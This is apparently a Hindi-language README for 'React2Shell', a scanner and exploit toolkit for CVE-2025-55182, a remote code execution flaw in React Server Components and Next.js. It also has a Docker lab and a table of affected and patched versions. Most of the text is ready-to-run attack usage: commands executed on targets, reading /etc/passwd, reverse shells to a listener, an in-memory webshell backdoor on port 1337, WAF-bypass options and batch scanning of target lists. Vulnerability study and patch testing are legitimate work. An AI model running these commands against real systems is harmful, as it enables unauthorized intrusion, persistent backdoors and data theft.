
CVE-2025-55182 सुरक्षा परीक्षण किट: CLI स्कैनर + Chrome एक्सटेंशन + Nuclei टेम्पलेट + Docker लैब।
CVE-2025-55182 Next.js/React Server Components RCE के लिए स्कैनर और एक्सप्लॉइट टूलकिट।
React2Shell/
├── browser-extension/ # ब्राउज़र-आधारित पहचान के लिए Chrome एक्सटेंशन
│ ├── manifest.json
│ ├── content.js
│ ├── popup.html/js
│ └── background.js
├── cli/ # कमांड-लाइन स्कैनर और एक्सप्लॉइट टूल
│ ├── react2shell.py
│ └── requirements.txt
├── docs/ # सीखने-केंद्रित दस्तावेज़ीकरण
│ ├── README.md # सीखने का पथ सूचकांक
│ ├── 01-fundamentals.md
│ ├── 02-vulnerability.md
│ ├── 03-exploitation.md
│ ├── 04-frameworks.md
│ └── 05-defense.md
├── lab/ # परीक्षण के लिए Docker प्रयोगशाला वातावरण
│ ├── vulnerable/ # असुरक्षित Next.js ऐप (React 19.2.0)
│ ├── patched/ # पैच किया गया Next.js ऐप (React 19.2.1)
│ ├── waf/ # ModSecurity WAF कंटेनर
│ ├── waku-app/ # असुरक्षित Waku ऐप (React 19.2.0)
│ ├── react-router-app/ # असुरक्षित React Router ऐप (React 19.2.0)
│ └── docker-compose.yml
└── nuclei/ # Nuclei टेम्पलेट
├── CVE-2025-55182.yaml # RCE पहचान (कोड निष्पादित करता है)
└── CVE-2025-55182-safe.yaml # सुरक्षित साइड-चैनल पहचान
cd cli
pip install -r requirements.txt
# लक्ष्य स्कैन करें
python react2shell.py https://target.com
# कमांड निष्पादित करें
python react2shell.py https://target.com -c "id"
# इंटरैक्टिव शेल
python react2shell.py https://target.com -i
chrome://extensions/ खोलेंbrowser-extension निर्देशिका चुनेंcd lab
docker-compose up -d
# Exploitable targets:
# Next.js Vulnerable: http://localhost:3011 ← Full RCE
# Waku Vulnerable: http://localhost:3014 ← RCE (blind - no HTTP output)
# React Router: http://localhost:3015 ← Full RCE (ESM)
# Protected targets:
# Next.js Patched: http://localhost:3012 ← Secure
# WAF Protected: http://localhost:3013 ← ModSecurity blocks exploits
nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com
cli/react2shell.py)--detect) - लक्ष्य फ्रेमवर्क का स्वतः पता लगाएं-E) - RSC एंडपॉइंट्स को स्वचालित रूप से खोजें-c) - मनमाने आदेश चलाएं-i) - स्थायी कमांड सत्र-r) - कई प्रकार: nc, bash, perl, python, ruby--webshell) - स्थायी बैकडोर स्थापना-f) - दूरस्थ फ़ाइलें सीधे पढ़ें-L) - पैकेज.json में असुरक्षित संस्करणों की जाँच करें-w), यूनिकोड एन्कोडिंग (-u), Vercel-विशिष्ट (-V)-x) - Burp Suite या अन्य प्रॉक्सी के माध्यम से रूट करें-s) - कोड निष्पादन के बिना साइड-चैनल पहचानbrowser-extension/)lab/)/RSC/F/{x}/{y}.txt पथ प्रारूप आवश्यकprocess.getBuiltinModule() का उपयोग कर पूर्ण RCE# मूल स्कैन (फ्रेमवर्क का स्वतः पता लगाता है)
python react2shell.py https://target.com
# फ्रेमवर्क का पता लगाएं और एंडपॉइंट्स की गणना करें
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v
# विभिन्न फ्रेमवर्क पर कमांड निष्पादित करें
python react2shell.py https://target.com -c "id" # Next.js (स्वचालित)
python react2shell.py https://target.com -F waku -c "id" # Waku (अंधा RCE)
python react2shell.py https://target.com -F react-router -c "id" # React Router (ESM)
# आउटपुट के साथ प्रयोगशाला उदाहरण
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt" # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id" # React Router
# सभी WAF बाईपास के साथ कमांड निष्पादित करें
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u
# प्रॉक्सी के माध्यम से इंटरैक्टिव शेल
python react2shell.py https://target.com -i -x http://127.0.0.1:8080
# मेमोरी-आधारित वेबशेल स्थापित करें (पोर्ट 1337 पर बैकडोर बनाता है)
python react2shell.py https://target.com --webshell mypassword
# एक्सेस: curl 'http://target:1337/?p=mypassword&cmd=id'
# रिवर्स शेल
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash
# स्थानीय प्रोजेक्ट को असुरक्षित संस्करणों के लिए स्कैन करें
python react2shell.py -L /path/to/project
# आउटपुट के साथ बैच स्कैन
python react2shell.py targets.txt -t 20 -o results.json -v
Execution Options:
-c, --cmd Command to execute
-i, --interactive Interactive shell session
-r, --reverse Reverse shell mode
-l, --lhost Listener host
-p, --lport Listener port
-S, --shell-type Shell type (nc, nc-mkfifo, bash, perl, python, ruby)
-f, --read-file Read a remote file
Scanning Options:
-P, --path Paths to test (comma-separated or file)
-t, --threads Number of threads (default: 10)
-T, --timeout Request timeout in seconds (default: 10)
-s, --safe Safe mode (no code execution)
-L, --local Scan local project directory
-F, --framework Target framework (auto, nextjs, waku, react-router, expo)
-E, --enumerate Enumerate RSC endpoints before exploitation
--detect Only detect framework and list endpoints
--webshell Install in-memory webshell on port 1337
--rce RCE proof-of-concept mode (default: safe mode)
Bypass Options:
-w, --waf-bypass Junk data padding
-W, --waf-size Junk size in KB (default: 128)
-u, --unicode Unicode encoding bypass
-V, --vercel-bypass Vercel-specific bypass
--windows Windows PowerShell payloads
Request Options:
-x, --proxy Proxy URL (e.g., http://127.0.0.1:8080)
-H, --header Custom headers
-A, --user-agent Custom User-Agent
-k, --insecure Disable SSL verification
Output Options:
-o, --output Save results to JSON
-v, --verbose Verbose output with version detection
-q, --quiet Only show vulnerable targets
--no-color Disable colors
--no-banner Hide banner
| क्षेत्र | मान |
|---|---|
| CVSS | 10.0 (गंभीर) |
| प्रभाव | अप्रमाणित दूरस्थ कोड निष्पादन (RCE) |
| प्रभावित | कोई भी RSC फ्रेमवर्क जो असुरक्षित React संस्करणों का उपयोग करता है |
| तंत्र | React Flight Protocol के माध्यम से प्रोटोटाइप प्रदूषण |
| फ्रेमवर्क | असुरक्षित | पैच किया गया |
|---|---|---|
| React | 19.0.0 - 19.2.0 | 19.2.1+ |
| Next.js | 14.0.0 - 15.4.7 | 15.4.8+ |
| Waku | < 0.27.2 | 0.27.2+ |
| React Router | 7.0.0 - 7.5.0 (RSC preview) | 7.5.1+ |
| Expo | Experimental RSC | React अपडेट करें |
| @vitejs/plugin-rsc | सभी असुरक्षित React के साथ | React अपडेट करें |
| @parcel/rsc | सभी असुरक्षित React के साथ | React अपडेट करें |
| RedwoodJS (rwsdk) | सभी असुरक्षित React के साथ | React अपडेट करें |
यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।
CVE-2025-55182 | CVSS 10.0 | केवल अधिकृत सुरक्षा परीक्षण के लिए